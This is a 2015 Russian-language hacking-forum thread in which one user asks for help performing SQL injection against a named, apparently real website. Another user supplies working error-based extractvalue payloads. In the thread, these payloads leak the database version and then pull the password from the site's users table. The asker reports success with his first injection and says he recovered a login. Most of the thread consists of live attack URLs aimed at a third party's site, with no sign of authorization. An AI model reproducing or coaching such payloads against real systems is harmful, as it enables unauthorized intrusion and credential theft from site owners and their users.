ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Помощь в SQL Injection (https://forum.antichat.xyz/showthread.php?t=426631)

semen6192 13.06.2015 22:23

Помогите доделать инъекцию сайта: http://worldwidestudies.org/ua/step/item/id/1

Вот что мне удалось проделать:

http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 --

Но никакие цифры не отображаются на сайте, но увидел что вместо "01 Вибір програми" отображается "{number} {title}", пробую писать следующее:

http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT TABLE_NAME,2,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES --

но сайт отображается как и раньше, вот и застрял на етом етапе, что делать не знаю, может здесь нет инъекции? А если есть, подскажите в каком направлении двигатся.

faza02 13.06.2015 22:38

Цитата:

Сообщение от semen6192

Помогите доделать инъекцию сайта:
http://worldwidestudies.org/ua/step/item/id/1
Вот что мне удалось проделать:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 --
Но никакие цифры не отображаются на сайте, но увидел что вместо "01 Вибір програми" отображается "
{number} {title}
", пробую писать следующее:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT TABLE_NAME,2,3,4,5,6,7 FROM INFORMATION_SCHEMA.TABLES --
но сайт отображается как и раньше, вот и застрял на етом етапе, что делать не знаю, может здесь нет инъекции? А если есть, подскажите в каком направлении двигатся.

попробуйте error-based

Код:

http://worldwidestudies.org/ua/step/item/id/1+and(extractvalue(1,concat(0x3a,version())))

semen6192 13.06.2015 22:47

Ето мы только что увидили какая версия БД используется?(XPATH syntax error: ':5.5.38')

И скинь мануал плз если есть на "ерор-базед", а то здесь нет: https://rdot.org/forum/showthread.php?t=124

И только что увидел вот: http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT 1,2,3,4,5,6,7 FROM users --

Нашел что есть таблица с именем "users".

И нашел что есть столбцы(login,password): http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users --

и вместо "login" можно еще постовить "password" и не выдает ошибки, но ошибки выдает когда пытаюсь вывести ето все на екран, вот таким образом: http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users LIMIT 0,1 --

И на етом етапе застрял...

faza02 13.06.2015 23:22

Цитата:

Сообщение от semen6192

Ето мы только что увидили какая версия БД используется?(XPATH syntax error: ':5.5.38')
И скинь мануал плз если есть на "ерор-базед", а то здесь нет:
https://rdot.org/forum/showthread.php?t=124
И только что увидел вот:
http://worldwidestudies.org/ua/step/item/id/9999999
UNION SELECT 1,2,3,4,5,6,7 FROM users --
Нашел что есть таблица с именем "users".
И нашел что есть столбцы(login,password):
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users --
и вместо "login" можно еще постовить "password" и не выдает ошибки, но ошибки выдает когда пытаюсь вывести ето все на екран, вот таким образом:
http://worldwidestudies.org/ua/step/item/id/9999999 UNION SELECT login,2,3,4,5,6,7 FROM users LIMIT 0,1 --

И на етом етапе застрял...


Код:

http://worldwidestudies.org/ua/step/item/id/1+and(extractvalue(1,concat(0x3a,(select%20password%20from%20users%20limit%200,1))))
статей нет. тут вся суть в векторе и запросе, который вам нужен.

semen6192 13.06.2015 23:39

епать.... нету слов, моя первая инъекция, канешн не без помощи, нашел и логин - методом подстановки. Спасибо!


Время: 18:48